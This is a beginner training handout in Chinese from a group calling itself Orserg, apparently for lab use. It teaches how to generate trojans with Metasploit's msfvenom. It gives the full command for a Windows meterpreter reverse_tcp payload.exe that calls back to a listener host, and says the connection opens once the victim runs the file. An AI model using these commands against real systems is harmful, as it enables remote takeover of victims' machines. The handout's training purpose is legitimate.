Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档

Orserg 内网安全项目组官方基础训练文档A-7项目

你好安全人员!我是Orserg一个高性能可开放托管组织,专针对初学安全人员提供最为简单并且完全免费的文档资料。很高兴认识你并且能让你从中学习到一些东西。如果你希望加入Orserg学到更多东西请在****上搜索Orserg关注并且私信我们,我们会在第一时间接收到并且联系你。

Orserg ISPT :

Hello!内网安全实验人员。我是Orserg内网安全项目组简称ISPT,针对学习内网安全的初级A类研究人员提供较为简单的实验项目。在这2个月内你将学会并使用Metasploit的多种基础攻击技能。如信息收集、漏洞扫描、漏洞利用、攻击载荷、免杀编码和社会工程方面的简单攻击。

实验环境:

该文件的所有实验只适用于内网安全,并且所有环境均为自己搭建,包括特殊系统镜像,渗透工具、或者是虚拟机等,请确保你有搭建实验平台的条件,才能顺利完成安全实验。Orserg ISPT在模拟环境方面可能会用到Windows Server服务器或服务器搭建等多种企业环境模拟技术这些技术都会展现在内网实验环境搭建

木马后门生成

Metasploit中有专门生成木马的程序msfvenom,可以用该程序生成各种平台Cisco ,OSX ,Solaris,BSD ,OpenBSD ,hardware,Firefox ,BSDi ,NetBSD,NodeJS,FreeBSD ,Python,AIX ,JavaScript,HPUX ,PHP ,Irix,Unix,Linux,Ruby,Java,Android,Netware,Windows,mainframe,multi等平台的恶意程序。
那么怎么使用它呢?

A-7-1 查看参数

1.直接在root终端里使用Msfveonm
Root> Msfvenom -h (看参数怎么使用它)
Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档
参数对应表
Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档

A-7-2 查询它能生成什么样的木马

在Root终端中直接输入查询命令

Root> msfvenom -format

Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档

Tip:当然Windows Metasploit也是一样
Windows>msfvenom -format

1.Framework Executable Formats [–format ] (可执行文件)
该类选项代表可生成的各个平台的文件类型
Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档

2. Framework Transform Formats [–format ] (可支持编程语言)
该类选项代表可支持什么编程语言

Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档

A-7-3 生成简单木马

  • 1.打开kali终端(多用户渗透系统请使用root终端权限打开)
  • 2.Kali>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.110.0.182 LPORT=4444 -f exe -o payload.exe
    Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档
    只要将木马上传与对方然后打开就会建立黑客连接

Windows Metasploit Tip

1. Windows cmd
2. Windows cmd> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.110.0.182 LPORT=4444 -f exe -o payload.exe
(请注意Orserg不是很建议在Windows上运行部署Metasploit里面有很多东西都是病毒漏洞利用模块,很难保证有东西不被杀毒软件杀除,且重装十分麻烦)
以下赠送一张Windows 10已经对该软件(Metasploit)下所有
文件路径对于杀毒软件做信任(意思是杀毒软件将不扫描该路径)但任然还是被杀毒软件杀掉某些部件的例子

Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档
Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档
所以这里并不建议渗透时用Windows去做渗透平台。

A-7-4 生成命令解析

Orserg ISPT 内网安全项目组A7-1 Or A7-4项目训练文档

Tip:权力越大,责任越大,请勿对任何实验项目外搭建的网络发起攻击、测试或者是任意一种扫描。